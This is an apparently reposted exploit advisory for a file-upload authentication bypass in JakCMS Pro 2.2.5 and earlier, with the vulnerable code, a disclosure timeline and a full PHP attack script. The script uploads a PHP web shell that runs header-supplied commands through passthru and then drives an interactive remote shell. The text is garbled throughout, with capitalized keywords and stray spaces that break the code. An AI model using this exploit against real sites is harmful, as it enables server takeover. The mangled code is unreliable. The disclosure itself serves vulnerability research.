Jakcms pro & lt; = 2.2.5 Remote Arbitrary File Upload Vulnerability and repair

 

Title: jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit

 

Author: EgiX

: Http://www.jakcms.com/

Affected Version n: 2.2.5

Test Platform: Windows 7 and Debian 6.0.2

<? Php

/*

--------------------------------------------------------

Jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit

--------------------------------------------------------

Author ......: EgiX

Mail ......: n0b0d13s [at] gmail [dot] com

Software link...: http://www.jakcms.com/

This PoC was written for educational purpose. Use it at your own risk.

 

Author will be not responsible for any damage.

 

[-] Vulnerable code in/js/editor/plugins/jakadminexplorer/php/session. php

 

119. if ($ SESSION ["check_session_variable"]! = ""){

120.

121. // Session Starten

122. session_start ();

123.

124. // Session-Variable ü berpr ü fen

125. if (! Isset ($ _ SESSION [$ SESSION ["check_session_variable"]) {

Www.2cto.com

 

126. include ("error. php ");

127. die;

 

128 .}

 

129 .}

This authentication schema cocould be bypassed due to an attacker might be able to start a session accessing to/index. php that set

 

For e.g. the "jak_lastURL" session variable, so cocould be set $ SESSION ["check_session_variable"] to bypass the check at line 125.

Successful exploitation allows attackers access to plugins functionality (see/js/editor/plugins/jakadminexplorer/php/action. php ),

In this way an attacker cocould be able to "delete", "create", "rename" any folder/file into webserver or upload arbitrary files.

 

The same vulnerability afflicts also jakadminimage, jakusrexplorer and jakusrimage plugins.

 

[-] Disclosure timeline:

[15/09/2011]-Vulnerability discovered

[16/09/2011]-Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager

 

[16/09/2011]-Vendor fix released in version 2.2.6

[21/09/2011]-Public disclosure

 

*/

Error_reporting (0 );

Set_time_limit (0 );

Ini_set ("default_socket_timeout", 5 );

Function http_send ($ host, $ packet)

{

If (! ($ Sock = fsockopen ($ host, 80 )))

Die ("\ n [-] No response from {$ host}: 80 \ n ");

Fputs ($ sock, $ packet );

Return stream_get_contents ($ sock );

 

}

 

Function RC4 ($ data)

 

 

{

 

 

$ Key = "success ";

 

 

$ S = range (1, 0,256 );

 

 

$ J = 0;

For ($ I = 0; I I <256; $ I ++)

 

{

$ J = ($ j + $ s [$ I] + ord ($ key [$ I % strlen ($ key)]) % 256;

$ X = $ s [$ I];

$ S [$ I] = $ s [$ j];

$ S [$ j] = $ x;

}

$ I = $ j = 0;

$ Ct = "";

For ($ y = 0; $ y <strlen ($ data); $ y ++)

 

{

$ I = ($ I + 1) % 256;

$ J = ($ j + $ s [$ I]) % 256;

 

$ X = $ s [$ I];

$ S [$ I] = $ s [$ j];

$ S [$ j] = $ x;

$ Ct. = $ data [$ y] ^ chr ($ s [($ s [$ I] + $ s [$ j]) % 256]);

}

Return $ ct;

 

 

}

 

 

 

 

Print "\ n + ------------------------------------------------------------------ + ";

 

 

Print "\ n | jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX | ";

 

 

Print "\ n + ------------------------------------------------------------------ + \ n ";

 

If ($ argc <3)

 

 

{

 

 

Print "\ nUsage...: php $ argv [0]

 

 

Print "\ nExample...: php $ argv [0] localhost /";

 

 

Print "\ nExample...: php $ argv [0] localhost/jakcms/\ n ";

Die ();

}

$ Host = $ argv [1];

 

$ Path = $ argv [2];

 

$ Packet = "GET {$ path} HTTP/1.0 \ r \ n ";

 

 

$ Packet. = "Host: {$ host} \ r \ n ";

 

 

$ Packet. = "Connection: close \ r \ n ";

Preg_match ("/PHPSESSID = ([^;] *);/I", http_send ($ host, $ packet), $ m );

 

 

$ Sid = $ m [1];

 

 

 

 

$ Payload = "-- o0oOo0o \ r \ n ";

 

 

$ Payload. = "Content-Disposition: form-data; name = \" edit1 \ "\ r \ n. php \ r \ n ";

 

 

$ Payload. = "-- o0oOo0o \ r \ n ";

 

 

$ Payload. = "Content-Disposition: form-data; name = \" input1 \ "; filename = \" foo \ "\ r \ n ";

 

$ Payload. = "<? Php \ $ {error_reporting (0)}. \ $ {print (_ code _)}. \ $ {passthru (base64_decode (\ $ _ SERVER [HTTP_CMD])}?> \ R \ n ";

 

$ Payload. = "-- o0oOo0o -- \ r \ n ";

 

 

 

 

$ Get = bin2hex (RC4 ("id = 1 & check_session_variable = jak_lastURL & upload_filetype = php & dir = {$ path} cache/sh "));

 

$ Packet = "POST {$ path} js/editor/plugins/jakadminexplorer /? Action = upload & get = {$ get} HTTP/1.0 \ r \ n ";

 

$ Packet. = "Host: {$ host} \ r \ n ";

 

$ Packet. = "Cookie: PHPSESSID ={$ sid} \ r \ n ";

 

 

$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";

 

 

$ Packet. = "Content-Type: multipart/form-data; boundary = o0oOo0o \ r \ n ";

 

$ Packet. = "Connection: close \ r \ n ";

 

$ Packet. = $ payload;

 

If (preg_match ("/Error/", http_send ($ host, $ packet) die ("\ n [-] Upload failed! \ N ");

$ Packet = "GET {$ path} cache/sh. php HTTP/1.0 \ r \ n ";

 

$ Packet. = "Host: {$ host} \ r \ n ";

 

 

$ Packet. = "Cmd: % s \ r \ n ";

 

$ Packet. = "Connection: close \ r \ n ";

 

 

 

 

While (1)

 

 

{

Print "\ njakcms-shell #";

 

 

If ($ cmd = trim (fgets (STDIN) = "exit") break;

 

 

Preg_match ("/_ code _ (. *)/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");

 

 

}

?>